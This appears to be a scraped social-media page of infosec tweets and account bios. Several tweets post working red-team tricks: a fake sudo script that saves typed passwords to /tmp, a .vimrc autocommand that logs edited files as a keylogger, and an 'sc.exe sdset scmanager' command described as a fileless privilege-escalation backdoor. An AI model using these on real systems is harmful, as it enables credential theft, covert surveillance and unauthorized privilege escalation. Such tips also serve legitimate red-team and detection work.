I'm thrilled to share my latest project: AuthStager. This is a proof-of-concept tool that generates a shellcode stager with authentication. github.com/HulkOperator/A…
Shout out to @MalDevAcademy, which is hands down the best resource to learn maldev.
After a little break, it’s time to get back to the @SANSOffensive Intro to C workshops! 😁
Always free. Always recorded.
Register online when you have a chance.
I'm super thrilled to share that I passed the OSCP last month. Thank you, @offsectraining, really loved the updated material.
Here's my blog sharing my experiences and advice to prepare for this journey: thehulksec.com/index.php/2023…#oscp#TryHarder
If you are threat hunting, the easiest way to hunt for DLL sideloads is to check the path of the process. Most red teams will run their payloads from C:\programdata, Temp, Public, Appdata or from desktop. Most windows applications don't run from these locations unless until they…
Red Teamers: this one solved a @RealTryHackMe challenge on stream last night! Have account with sudo perms but don't have password? Write a fake sudo and redirect PATH in .bashrc:
#!/bin/bash
echo -n "Password: "; read -s password; echo $password >> /tmp/kekw; echo
#redteam
Our very own Senior Technical Recruiter Amy Krutz shared valuable advice on how to write an effective cybersecurity resume: youtube.com/watch?v=zZSiml…
Some tips 👇🧵
Red Teamers: Vim is practically ubiquitous across Linux hosts, and you can use it as a keylogger. On a dev box and want to see what passwords are written into config files? Slap this into .vimrc or ~/.vim/plugins:
:autocmd BufWritePost * :silent :w! >> /tmp/keylog.txt
#redteam
Red Teamers: here's a sneaky one - a file-less, persistent, local privilege escalation backdoor!
sc.exe sdset scmanager D:(A;;KA;;;WD)
Setting the security descriptor on the service manager to allow anyone to start SYSTEM services! Will Blue notice this?? ;)
#redteam
Need an almost invisible, post-exploitation, persistent, fileless, LPE backdoor? There are many, but this one looks really beautiful for me: type "sc.exe sdset scmanager D:(A;;KA;;;WD)" from an elevated command prompt.
130 Followers 2K FollowingUm aquariano inquieto e curioso, que vive em busca de conhecimento. Técnico em Informática, Programador de Software, Geek, Nerd, Rockeiro, Filósofo e Artista.
12K Followers 488 FollowingSr. Penetration Tester / Red Team Operator @ptswarm :: Author of the Pentester’s Promiscuous Notebook :: He/him :: Tweets’re my pwn 🐣
3K Followers 33 FollowingBallisKit provides tooling and services to professional Pentesters & Red Teams.
We develop MacroPack, ShellcodePack, and DarwinOps.
#redteam #infosec
11K Followers 716 Following// principal cybersecurity anarchist
// unethical hacker
// ex aws, wn, else
// @redteamvillage_ & @sec_defcon daemon
// take sincerely at your own risk
3K Followers 389 FollowingRed Teamer & Security researcher
Maintainer of #NetExec, #DonPAPI, dploot, certsync, and all the stuff on my github repo
bsky: https://t.co/zISpgvDSWc
5K Followers 2K FollowingRemote desktop protocol expert, OSS contributor and Microsoft MVP. I love designing products with Rust, C# and PowerShell. Proud to be CTO at Devolutions. 🇨🇦
690K Followers 1K FollowingUbuntu is an open source software operating system that runs from the desktop, to the cloud, to all your internet connected things.
4K Followers 408 FollowingCEO of World Cyber Health | Founder of @MalwareVillage | Creator of https://t.co/AKyp6xNeDy | Malware Researcher | Keynote | Banned from JSAC
324K Followers 3K FollowingThe only official HackerOne Twitter account.
A global leader in offensive security solutions. #HackForGood #togetherwehitharder
1K Followers 125 FollowingSecurity Professional and Researcher with over a decade of experience. I'm fairly low profile, but share useful info from time to time.
6K Followers 2K Following🏳️🌈 Founder @_OpenSecurity_ // Former @BHInfoSecurity // Former SANS // Former USAF / Former me… #RedTeamFit /https://t.co/TkCZZSc4xA